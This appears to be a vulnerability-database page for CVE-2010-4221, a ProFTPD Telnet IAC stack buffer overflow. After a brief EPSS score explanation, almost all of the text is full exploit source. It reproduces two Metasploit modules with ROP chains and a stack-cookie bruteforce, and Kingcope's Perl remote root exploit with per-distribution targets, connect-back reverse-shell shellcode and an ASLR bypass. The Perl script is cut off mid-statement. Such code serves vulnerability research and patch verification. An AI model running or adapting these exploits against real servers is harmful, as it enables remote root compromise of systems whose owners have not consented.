CVE-2010-4221 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # $Id: proftp_telnet_iac.rb 11208 2010-12-02 21:10:03Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)', 'Description' => %q{ This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code. }, 'Author' => [ 'jduck' ], 'Version' => '$Revision: 11208 $', 'References' => [ ['CVE', '2010-4221'], ['OSVDB', '68985'], ['BID', '44562'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'PrependChrootBreak' => true }, 'Privileged' => true, 'Payload' => { 'Space' => 1024, # NOTE: \xff's need to be doubled (per ftp/telnet stuff) 'BadChars' => "\x00\x0a\x0d", 'PrependEncoder' => "\x83\xec\x7f", # sub esp,0x7f (fix esp) }, 'Platform' => [ 'bsd' ], 'Targets' => [ # # Automatic targeting via fingerprinting # [ 'Automatic Targeting', { 'auto' => true } ], # # This special one comes first since we dont want its index changing. # [ 'Debug', { 'IACCount' => 8192, # should cause crash writing off end of stack 'Offset' => 0, 'Ret' => 0x41414242, 'Writable' => 0x43434545 } ], # # specific targets # [ 'ProFTPD 1.3.2a Server (FreeBSD 8.0)', { 'IACCount' => 1024, 'Offset' => 0x414, #'Ret' => 0xbfbfeac4, 'Writable' => 0x80e64a4, 'Bruteforce' => { 'Start' => { 'Ret' => 0xbfbffdfc }, 'Stop' => { 'Ret' => 0xbfa00000 }, 'Step' => 512 } } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 1 2010')) register_options( [ Opt::RPORT(21), ], self.class ) end def check # NOTE: We don't care if the login failed here... ret = connect # We just want the banner to check against our targets.. print_status("FTP Banner: #{banner.strip}") status = CheckCode::Safe if banner =~ /ProFTPD (1\.3\.[23][^ ])/i ver = $1 maj,min,rel = ver.split('.') relv = rel.slice!(0,1) case relv when '2' if rel.length > 0 if rel[0,2] == 'rc' if rel[2,rel.length].to_i >= 3 status = CheckCode::Vulnerable end else status = CheckCode::Vulnerable end end when '3' # 1.3.3+ defaults to vulnerable (until >= 1.3.3c) status = CheckCode::Vulnerable if rel.length > 0 if rel[0,2] != 'rc' and rel[0,1] > 'b' status = CheckCode::Safe end end end end disconnect return status end def target return @mytarget if @mytarget super end def exploit connect # Use a copy of the target @mytarget = target if (target['auto']) @mytarget = nil print_status("Automatically detecting the target...") if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then print_status("FTP Banner: #{banner.strip}") version = m[1] else raise RuntimeError, "No matching target" end regexp = Regexp.escape(version) self.targets.each do |t| if (t.name =~ /#{regexp}/) then @mytarget = t break end end if (not @mytarget) raise RuntimeError, "No matching target" end print_status("Selected Target: #{@mytarget.name}") pl = exploit_regenerate_payload(@mytarget.platform, arch) if not pl raise RuntimeError, 'Unable to regenerate payload!' end else print_status("Trying target #{@mytarget.name}...") if banner print_status("FTP Banner: #{banner.strip}") end pl = payload end disconnect super end def brute_exploit(addrs) @mytarget ||= target ret = addrs['Ret'] print_status("Trying return address 0x%.8x..." % ret) #puts "attach and press any key"; bleh = $stdin.gets buf = '' buf << 'SITE ' # NOTE: buf must be odd-lengthed prior to here. buf << "\xff" * @mytarget['IACCount'] buf << rand_text_alphanumeric(@mytarget['Offset'] - buf.length) buf << [ ret, @mytarget['Writable'] ].pack('V*') buf << payload.encoded buf << "\r\n" connect sock.put(buf) disconnect handler end end

## # $Id: proftp_telnet_iac.rb 11525 2011-01-09 23:33:24Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking #include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)', 'Description' => %q{ This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code. The Debian Squeeze version of the exploit uses a little ROP stub to indirectly transfer the flow of execution to a pool buffer (the cmd_rec "res" in "pr_cmd_read"). The Ubuntu version uses a full-blow ROP to mmap RWX memory, copy a small stub to it, and execute the stub. The stub then copies the remainder of the payload in and executes it. NOTE: Most Linux distributions either do not ship a vulnerable version of ProFTPD, or they ship a version compiled with stack smashing protection. Although SSP significantly reduces the probability of a single attempt succeeding, it will not prevent exploitation. Since the daemon forks in a default configuration, the cookie value will remain the same despite some attemtps failing. By making repeated requests, an attacker can eventually guess the cookie value and exploit the vulnerability. The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness and could allow exploitation in semi-reasonable amount of time. }, 'Author' => [ 'jduck' ], 'Version' => '$Revision: 11525 $', 'References' => [ ['CVE', '2010-4221'], ['OSVDB', '68985'], ['BID', '44562'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'PrependChrootBreak' => true }, 'Privileged' => true, 'Payload' => { 'Space' => 4096, # NOTE: \xff are avoided here so we can control the number of them being sent. 'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\xff", 'DisableNops' => 'True', }, 'Platform' => [ 'linux' ], 'Targets' => [ # # Automatic targeting via fingerprinting # [ 'Automatic Targeting', { 'auto' => true } ], # # This special one comes first since we dont want its index changing. # [ 'Debug', { 'IACCount' => 8192, # should cause crash writing off end of stack 'Offset' => 0, 'Ret' => 0x41414242, 'Writable' => 0x43434545 } ], # # specific targets # # NOTE: this minimal rop works most of the time, but it can fail # if the proftpd pool memory is in a different order for whatever reason... [ 'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1', { 'IACCount' => 4096+16, 'Offset' => 0x102c-4, # NOTE: All addresses are from the proftpd binary 'Ret' => 0x805a547, # pop esi / pop ebp / ret 'Writable' => 0x80e81a0, # .data 'RopStack' => [ # Writable is here 0xcccccccc, # unused 0x805a544, # mov eax,esi / pop ebx / pop esi / pop ebp / ret 0xcccccccc, # becomes ebx 0xcccccccc, # becomes esi 0xcccccccc, # becomes ebp # quadruple deref the res pointer :) 0x8068886, # mov eax,[eax] / ret 0x8068886, # mov eax,[eax] / ret 0x8068886, # mov eax,[eax] / ret 0x8068886, # mov eax,[eax] / ret # skip the pool chunk header 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret 0x805bd8e, # inc eax / adc cl, cl / ret # execute the data :) 0x0805c26c, # jmp eax ], } ], # For the version compiled with symbols :) [ 'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)', { 'IACCount' => 4096+16, 'Offset' => 0x1028-4, # NOTE: All addresses are from the proftpd binary 'Writable' => 0x80ec570, # .data 'Ret' => 0x80d78c2, # pop esi / pop ebp / ret 'RopStack' => [ # Writable is here #0x0808162a, # jmp esp (works w/esp fixup) 0xcccccccc, # unused becomes ebp 0x80d78c2, # mov eax,esi / pop esi / pop ebp / ret 0xcccccccc, # unused becomes esi 0xcccccccc, # unused becomes ebp # quadruple deref the res pointer :) 0x806a915, # mov eax,[eax] / pop ebp / ret 0xcccccccc, # unused becomes ebp 0x806a915, # mov eax,[eax] / pop ebp / ret 0xcccccccc, # unused becomes ebp 0x806a915, # mov eax,[eax] / pop ebp / ret 0xcccccccc, # unused becomes ebp 0x806a915, # mov eax,[eax] / pop ebp / ret 0xcccccccc, # unused becomes ebp # skip the pool chunk header 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret 0x805d6a9, # inc eax / adc cl, cl / ret # execute the data :) 0x08058de6, # jmp eax ], } ], [ 'ProFTPD 1.3.2c Server (Ubuntu 10.04)', { 'IACCount' => 1018, 'Offset' => 0x420, 'CookieOffset' => -0x20, 'Writable' => 0x80db3a0, # becomes esi (beginning of .data) 'Ret' => 0x805389b, # pop esi / pop ebp / ret 'RopStack' => [ 0xcccccccc, # becomes ebp 0x8080f04, # pop eax / ret 0x80db330, # becomes eax (GOT of mmap64) 0x806a716, # mov eax, [eax] / ret 0x805dd5c, # jmp eax 0x80607b2, # add esp, 0x24 / pop ebx / pop ebp / ret # mmap args 0, 0x20000, 0x7, 0x22, 0xffffffff, 0, 0, # unused 0xcccccccc, # unused 0xcccccccc, # unused 0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx 0xcccccccc, # becomes ebp # note, ebx gets fixed above :) # 0xfe in 'ah' doesn't matter since we have more than enough space. # now, load an instruction to store to eax 0x808b542, # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret # becomes edx - mov [eax+ebp*4]; ebx / ret "\x89\x1c\xa8\xc3".unpack('V').first, # store it :) 0x805c2d0, # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret 0xcccccccc, # unused 0xcccccccc, # unused 0xcccccccc, # unused 0xcccccccc, # unused 0xcccccccc, # becomes ebx 0xcccccccc, # becomes esi 0xcccccccc, # becomes ebp # Copy the following stub: #"\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df] #"\x8d\x78\x12" # lea edi, [eax+0x12] #"\x6a\x7f" # push 0x7f #"\x59" # pop ecx #"\xf2\xa5" # rep movsd 0x80607b5, # pop ebx / pop ebp / ret 0xfb2124b4, # becomes ebx 1, # becomes ebp 0x805dd5c, # jmp eax 0x80607b5, # pop ebx / pop ebp / ret 0x788dffff, # becomes ebx 2, # becomes ebp 0x805dd5c, # jmp eax 0x80607b5, # pop ebx / pop ebp / ret 0x597f6a12, # becomes ebx 3, # becomes ebp 0x805dd5c, # jmp eax 0x80607b5, # pop ebx / pop ebp / ret 0x9090a5f2, # becomes ebx 4, # becomes ebp 0x805dd5c, # jmp eax 0x80607b5, # pop ebx / pop ebp / ret 0x8d909090, # becomes ebx 0, # becomes ebp 0x805dd5c, # jmp eax # hopefully we dont get here 0xcccccccc, ], } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 1 2010')) register_options( [ Opt::RPORT(21), ], self.class ) end def check # NOTE: We don't care if the login failed here... ret = connect banner = sock.get_once # We just want the banner to check against our targets.. print_status("FTP Banner: #{banner.strip}") status = CheckCode::Safe if banner =~ /ProFTPD (1\.3\.[23][^ ])/i ver = $1 maj,min,rel = ver.split('.') relv = rel.slice!(0,1) case relv when '2' if rel.length > 0 if rel[0,2] == 'rc' if rel[2,rel.length].to_i >= 3 status = CheckCode::Vulnerable end else status = CheckCode::Vulnerable end end when '3' # 1.3.3+ defaults to vulnerable (until >= 1.3.3c) status = CheckCode::Vulnerable if rel.length > 0 if rel[0,2] != 'rc' and rel[0,1] > 'b' status = CheckCode::Safe end end end end disconnect return status end def exploit connect banner = sock.get_once # Use a copy of the target mytarget = target if (target['auto']) mytarget = nil print_status("Automatically detecting the target...") if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then print_status("FTP Banner: #{banner.strip}") version = m[1] else raise RuntimeError, "No matching target" end regexp = Regexp.escape(version) self.targets.each do |t| if (t.name =~ /#{regexp}/) then mytarget = t break end end if (not mytarget) raise RuntimeError, "No matching target" end print_status("Selected Target: #{mytarget.name}") else print_status("Trying target #{mytarget.name}...") if banner print_status("FTP Banner: #{banner.strip}") end end #puts "attach and press any key"; bleh = $stdin.gets buf = '' buf << 'SITE ' #buf << "\xcc" if mytarget['CookieOffset'] buf << "\x8d\xa0\xfc\xdf\xff\xff" # lea esp, [eax-0x2004] end buf << payload.encoded # The number of characters left must be odd at this point. buf << rand_text(1) if (buf.length % 2) == 0 buf << "\xff" * (mytarget['IACCount'] - payload.encoded.length) buf << rand_text_alphanumeric(mytarget['Offset'] - buf.length) addrs = [ mytarget['Ret'], mytarget['Writable'] ].pack('V*') if mytarget['RopStack'] addrs << mytarget['RopStack'].map { |e| if e == 0xcccccccc rand_text(4).unpack('V').first else e end }.pack('V*') end # Make sure we didn't introduce instability addr_badchars = "\x09\x0a\x0b\x0c\x20" if idx = Rex::Text.badchar_index(addrs, addr_badchars) raise RuntimeError, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx]) end buf << addrs buf << "\r\n" # # In the case of Ubuntu, the cookie has 24-bits of entropy. Further more, it # doesn't change while proftpd forks children. Therefore, we can try forever # and eventually guess it correctly. # # NOTE: if the cookie contains one of our bad characters, we're SOL. # if mytarget['CookieOffset'] print_status("!!! Attempting to bruteforce the cookie value! This can takes days. !!!") disconnect max = 0xffffff00 off = mytarget['Offset'] + mytarget['CookieOffset'] cookie = last_cookie = 0 #cookie = 0x17ccd600 start = Time.now last = start - 10 while not session_created? now = Time.now if (now - last) >= 10 perc = (cookie * 100) / max qps = ((cookie - last_cookie) >> 8) / 10.0 print_status("%.2f%% complete, %.2f attempts/sec - Trying: 0x%x" % [perc, qps, cookie]) last = now last_cookie = cookie end sd = connect(false) sd.get_once buf[off, 4] = [cookie].pack('V') sd.put(buf) disconnect(sd) cookie += 0x100 break if cookie > max end if not session_created? raise RuntimeError, "Unable to guess the cookie value, sorry :-/" end else sock.put(buf) disconnect end handler end end

# Exploit Title: ProFTPD IAC Remote Root Exploit # Date: 7 November 2010 # Author: Kingcope # # E-DB Note: If you have issues with this exploit, alter lines 549, 555 and 563. use IO::Socket; $numtargets = 13; @targets = ( # Plain Stack Smashing #Confirmed to work ["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC "FreeBSD", # OPERATING SYSTEM 0, # EXPLOIT STYLE 0xbfbfe000, # OFFSET START 0xbfbfff00, # OFFSET END 1029], # ALIGN #Confirmed to work ["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)", "FreeBSD", 0, 0xbfbfe000, 0xbfbfff00, 1021], # Return into Libc #Confirmed to work ["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, # EXPLOIT STYLE 0x0804CCD4, # write(2) offset 8189, # ALIGN 0], # PADDING # Confirmed to work ["Debian GNU/Linux 5.0, ProFTPD 1.3.3 Server (Plesk binary)", "Linux", 1, 0x0804D23C, 4101, 0], #Confirmed to work ["Debian GNU/Linux 4.0, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, 0x0804C9A4, 8189, 0], #Confirmed to work ["Debian Linux Squeeze/sid, ProFTPD 1.3.3a Server (distro binary)", "Linux", 1, 0x080532D8, 4101, 12], ["SUSE Linux 9.3, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, 0x0804C9C4, 8189, 0], ["SUSE Linux 10.0/10.3, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, 0x0804CAA8, 8189, 0], ["SUSE Linux 10.2, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, 0x0804CBBC, 8189, 0], ["SUSE Linux 11.0, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, 0x0804CCBC, 8189, 0], #Confirmed to work ["SUSE Linux 11.1, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, 0x0804CCE0, 8189, 0], ["SUSE Linux SLES 10, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, 0x0804CA2C, 8189, 0], #Confirmed to work ["CentOS 5, ProFTPD 1.3.2e Server (Plesk binary)", "Linux", 1, 0x0804C290, 8189, 0], # feel free to add more targets. ); #freebsd reverse shell port 45295 #setup a netcat on this port ^^ $bsdcbsc = # setreuid "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80". # connect back :> "\x31\xc0\x31\xdb\x53\xb3\x06\x53". "\xb3\x01\x53\xb3\x02\x53\x54\xb0". "\x61\xcd\x80\x31\xd2\x52\x52\x68". "\x41\x41\x41\x41\x66\x68\xb0\xef". "\xb7\x02\x66\x53\x89\xe1\xb2\x10". "\x52\x51\x50\x52\x89\xc2\x31\xc0". "\xb0\x62\xcd\x80\x31\xdb\x39\xc3". "\x74\x06\x31\xc0\xb0\x01\xcd\x80". "\x31\xc0\x50\x52\x50\xb0\x5a\xcd". "\x80\x31\xc0\x31\xdb\x43\x53\x52". "\x50\xb0\x5a\xcd\x80\x31\xc0\x43". "\x53\x52\x50\xb0\x5a\xcd\x80\x31". "\xc0\x50\x68\x2f\x2f\x73\x68\x68". "\x2f\x62\x69\x6e\x89\xe3\x50\x54". "\x53\x50\xb0\x3b\xcd\x80\x31\xc0". "\xb0\x01\xcd\x80"; #linux reverse shell port 45295 by bighawk #setup a netcat on this port ^^ $lnxcbsc = # setreuid "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x90\x90\x90". # connect back :> "\x6a\x66". "\x58". "\x6a\x01". "\x5b". "\x31\xc9". "\x51". "\x6a\x01". "\x6a\x02". "\x89\xe1". "\xcd\x80". "\x68\x7f\x7f\x7f\x7f". # IP "\x66\x68\xb0\xef". # PORT "\x66\x6a\x02". "\x89\xe1". "\x6a\x10". "\x51". "\x50". "\x89\xe1". "\x89\xc6". "\x6a\x03". "\x5b". "\x6a\x66". "\x58". "\xcd\x80". "\x87\xf3". "\x6a\x02". "\x59". "\xb0\x3f". "\xcd\x80". "\x49". "\x79\xf9". "\xb0\x0b". "\x31\xd2". "\x52". "\x68\x2f\x2f\x73\x68". "\x68\x2f\x62\x69\x6e". "\x89\xe3". "\x52". "\x53". "\x89\xe1". "\xcd\x80"; sub exploit1 { for ($counter=$targets[$ttype][3]; $counter < $targets[$ttype][4]; $counter += 250) { printf("[$target] CURRENT OFFSET = %08x :pP\n", $counter); $ret = pack("V", $counter); $align = $targets[$ttype][5]; my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 21, Proto => 'tcp'); $stack = "KCOPERULEZKCOPERULEZKC" . $ret . "\x90" x 500 . $shellcode . "A" x 10; $v = <$sock>; print $sock "\x00" x $align . "\xff" . $stack . "\n"; close($sock); } } # Linux technique to retrieve a rootshell (C) kingcope 2010 # # uses write(2) to fetch process memory out of the remote box (you can find the offset using IDA) # only the write(2) plt entry offset is needed for the exploit to work (and of course the # align value) # once the correct write value is given to the exploit it fetches the memory space of proftpd. # with this information the exploit can find function entries and byte values # relative to the write(2) address. # once the memory is read out the exploit does the following to circumvent linux adress space # randomization: # # 1.) calculate mmap64() plt entry # 2.) seek for assembly instructions in the proftpd memory space relative to write(2) # such as pop pop ret instructions # 3.) call mmap64() to map at address 0x10000000 with protection read,write,execute # 4.) calculate offset for memcpy() which is later used to construct the shellcode copy routine # 4.) copy known assembly instructions (which have been found before using the memory read) # to address 0x10000000. these instructions will copy the shellcode from ESP to 0x10000100 # and make use of the memcpy found before # 5.) actually jump to the shellcode finder # 6.) once the shellcode has been copied to 0x10000100 jump to it # 7.) shellcode gets executed and we have our desired root shell. sub exploit2 { printf("[$target] %s :pP\n", $targets[$ttype][0]); $align = $targets[$ttype][4]; $write_offset = $targets[$ttype][3]; $padding = $targets[$ttype][5]; $|=1; print "align = $align\n"; print "Seeking for write(2)..\n"; #known good write(2) values #0x0804C290 #0x0804A85C #0x0804A234 #0x08052830 #080532D8 proftpd-basic_1.3.3a-4_i386 #08052938 proftpd-basic_1.3.2e-4_i386 (ubunutu) #0804CCD4 psa-proftpd_1.3.2e-debian5.0.build95100504.17_i386 !! printf "Using write offset %08x.\n", $write_offset; $k = $write_offset; $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 21, Proto => 'tcp'); $sock->sockopt(SO_LINGER, pack("ii", 1, 0)); #$x = <stdin>; $stack = "KCOPERULEZKCOPERULEZKC". "C" x $padding . pack("V", $k). # write "\xcc\xcc\xcc\xcc". "\x01\x00\x00\x00". # fd for write pack("V", $k). # buffer for write "\xff\xff\x00\x00"; # length for write $v = <$sock>; print $sock "\x00" x $align . "\xff" . $stack . "\n"; vec ($rfd, fileno($sock), 1) = 1; $timeout = 2; if (select ($rfd, undef, undef, $timeout) >= 0 && vec($rfd, fileno($sock), 1)) { if (read($sock, $buff, 0xffff) == 0xffff) { printf "\nSUCCESS. write(2) is at %08x\n", $k; close($sock); goto lbl1; } } close($sock); printf "wrong write(2) offset.\n"; exit; lbl1: # Once we're here chances are good that we get the root shell print "Reading memory from server...\n"; my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 21, Proto => 'tcp'); $stack = "KCOPERULEZKCOPERULEZKC" . "C" x $padding . pack("V", $k). # write "\xcc\xcc\xcc\xcc". "\x01\x00\x00\x00". # fd for write pack("V", $k). # buffer for write "\xff\xff\x0f\x00"; # length for write $v = <$sock>; print $sock "\x00" x $align . "\xff" . $stack . "\n"; read($sock, $buff, 0xfffff); if (($v = index $buff, "\x5E\x5F\x5D") >= 0) { $pop3ret = $k + $v; printf "pop pop pop ret located at %08x\n", $pop3ret; } else { print "Could not find pop pop pop ret\n"; exit; } if (($v = index $buff, "\x83\xC4\x20\x5B\x5E\x5D\xC3") >= 0) { $largepopret = $k + $v; printf "large pop ret located at %08x\n", $largepopret; } else { print "Could not find pop pop pop ret\n"; exit; } if (($v = index $buff, "\xC7\x44\x24\x08\x03\x00\x00\x00\xC7\x04\x24\x00\x00\x00\x00\x89\x44\x24\x04") >= 0) { $addr1 = $k+$v+23; $mmap64 = unpack("I", substr($buff, $v+20, 4)); $mmap64 = $addr1 - (0xffffffff-$mmap64); printf "mmap64 is located at %08x\n", $mmap64; } else { if (($v = index $buff, "\x89\x44\x24\x10\xA1\xBC\xA5\x0F\x08\x89\x44\x24\x04\xe8") >= 0) { $addr1 = $k+$v+17; $mmap64 = unpack("I", substr($buff, $v+14, 4)); $mmap64 = $addr1 - (0xffffffff-$mmap64); printf "mmap64 is located at %08x\n", $mmap64; } else { print "Could not find mmap64()\n"; exit; } } if (($v = index $buff, "\x8D\x45\xF4\x89\x04\x24\x89\x54\x24\x08\x8B\x55\x08\x89\x54\x24\x04\xE8") >= 0) { $addr1 = $k+$v+21; $memcpy = unpack("I", substr($buff, $v+18, 4)); $memcpy = $addr1 - (0xffffffff-$memcpy); printf "memcpy is located at %08x\n", $memcpy; } else { if (($v = index $buff, "\x8B\x56\x10\x89\x44\x24\x08\x89\x54\x24\x04\x8B\x45\xE4\x89\x04\x24\xe8") >= 0) { $addr1 = $k+$v+21; $memcpy = unpack("I", substr($buff, $v+18, 4)); $memcpy = $addr1 - (0xffffffff-$memcpy); printf "memcpy is located at %08x\n", $memcpy; } else { if (($v = index $buff, "\x89\x44\x24\x04\xA1\xBC\x9F\x0E\x08\x89\x04\x24") >= 0) { $addr1 = $k+$v+16; $memcpy = unpack("I", substr($buff, $v+13, 4)); $memcpy = $addr1 - (0xffffffff-$memcpy); printf "memcpy is located at %08x\n", $memcpy; } else { if (($v = index $buff, "\x89\x7C\x24\x04\x89\x1C\x24\x89\x44\x24\x08") >= 0) { $addr1 = $k+$v+15; $memcpy = unpack("I", substr($buff, $v+12, 4)); $memcpy = $addr1 - (0xffffffff-$memcpy); printf "memcpy is located at %08x\n", $memcpy; } else { if (($v = index $buff, "\x8B\x55\x10\x89\x74\x24\x04\x89\x04\x24\x89\x54\x24\x08") >= 0) { $addr1 = $k+$v+18; $memcpy = unpack("I", substr($buff, $v+15, 4)); $memcpy = $addr1 - (0xffffffff-$memcpy); printf "memcpy is located at %08x\n", $memcpy; } else { print "Could not find memcpy()\n"; exit; } } } } } if (($v = index $buff, "\xfc\x8b") >= 0) { $byte1 = $k+$v; printf ("byte1: %08x\n", $byte1); } else { print "Could not find a special byte\n"; exit; } if (($v = index $buff, "\xf4") >= 0) { $byte2 = $k+$v; printf ("byte2: %08x\n", $byte2); } else { print "Could not find a special byte\n"; exit; } if (($v = index $buff, "\xbf") >= 0) { $byte3 = $k+$v; printf ("byte3: %08x\n", $byte3); } else { print "Could not find a special byte\n"; exit; } if (($v = index $buff, "\x00\x01\x00") >= 0) { $byte4 = $k+$v; printf ("byte4: %08x\n", $byte4); } else { print "Could not find a special byte\n"; exit; } if (($v = index $buff, "\x10") >= 0) { $byte5 = $k+$v; printf ("byte5: %08x\n", $byte5); } else { print "Could not find a special byte\n"; exit; } if (($v = index $buff, "\xB9\x00\x02\x00\x00") >= 0) { $byte6 = $k+$v; printf ("byte6: %08x\n", $byte6); } else { print "Could not find a special byte\n"; exit; } if (($v = index $buff, "\xf3") >= 0) { $byte7 = $k+$v; printf ("byte7: %08x\n", $byte7); } else { print "Could not find a special byte\n"; exit; } if (($v = index $buff, "\xA4") >= 0) { $byte8 = $k+$v; printf ("byte8: %08x\n", $byte8); } else { print "Could not find a special byte\n"; exit; } if (($v = index $buff, "\xeb\xff") >= 0) { $byte9 = $k+$v; printf ("byte9: %08x\n", $byte9); } else { print "Could not find a special byte\n"; exit; } # shellcode copy routine: #0100740B FC CLD #0100740C 8BF4 MOV ESI,ESP #0100740E BF 00010010 MOV EDI,10000100 #01007413 B9 00020000 MOV ECX,200 #01007418 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[> # EB FF JMP +0xFF # FC 8B # F4 BF # 00 01 00 # 10 # B9 00 02 00 00 # F3:A4 # EB FF # El1Te X-Ploit TechNiqUe (C) print "Building exploit buffer\n"; $stack = "KCOPERULEZKCOPERULEZKC" . "C" x $padding . pack("V", $mmap64). # mmap64() pack("V", $largepopret). # add esp, 20h; pop; pop "\x00\x00\x00\x10". # mmap start "\x00\x10\x00\x00". # mmap size "\x07\x00\x00\x00". # mmap prot "\x32\x00\x00\x00". # mmap flags "\xff\xff\xff\xff". # mmap fd "\x00\x00\x00\x00". # mmap offset "\x00\x00\x00\x00". # mmap offset "\x00\x00\x00\x00". "\x00\x00\x00\x00". "\x00\x00\x00\x00". "\x00\x00\x00\x00". pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x00\x00\x00\x10". # destination pack("V", $byte1). # origin "\x02\x00\x00\x00". # number of bytes to copy pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x02\x00\x00\x10". # destination pack("V", $byte2). # origin "\x01\x00\x00\x00". # number of bytes to copy pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x03\x00\x00\x10". # destination pack("V", $byte3). # origin "\x01\x00\x00\x00". # number of bytes to copy pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x04\x00\x00\x10". # destination pack("V", $byte4). # origin "\x03\x00\x00\x00". # number of bytes to copy pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x07\x00\x00\x10". # destination pack("V", $byte5). # origin "\x01\x00\x00\x00". # number of bytes to copy pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x08\x00\x00\x10". # destination pack("V", $byte6). # origin "\x05\x00\x00\x00". # number of bytes to copy pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x0d\x00\x00\x10". # destination pack("V", $byte7). # origin "\x01\x00\x00\x00". # number of bytes to copy pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x0e\x00\x00\x10". # destination pack("V", $byte8). # origin "\x01\x00\x00\x00". # number of bytes to copy pack("V", $memcpy). # memcpy() pack("V", $pop3ret). # pop; pop; pop; retn "\x0f\x00\x00\x10". # destination pack("V", $byte9). # origin "\x02\x00\x00\x00". # number of bytes to copy "\x00\x00\x00\x10". # JUMP TO 0x10000000 rwxp address "\x90" x 100 . $shellcode . "\x90" x 10; print "Sending exploit buffer!\n"; my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 21, Proto => 'tcp'); $v = <$sock>; print $sock "\x00" x $align . 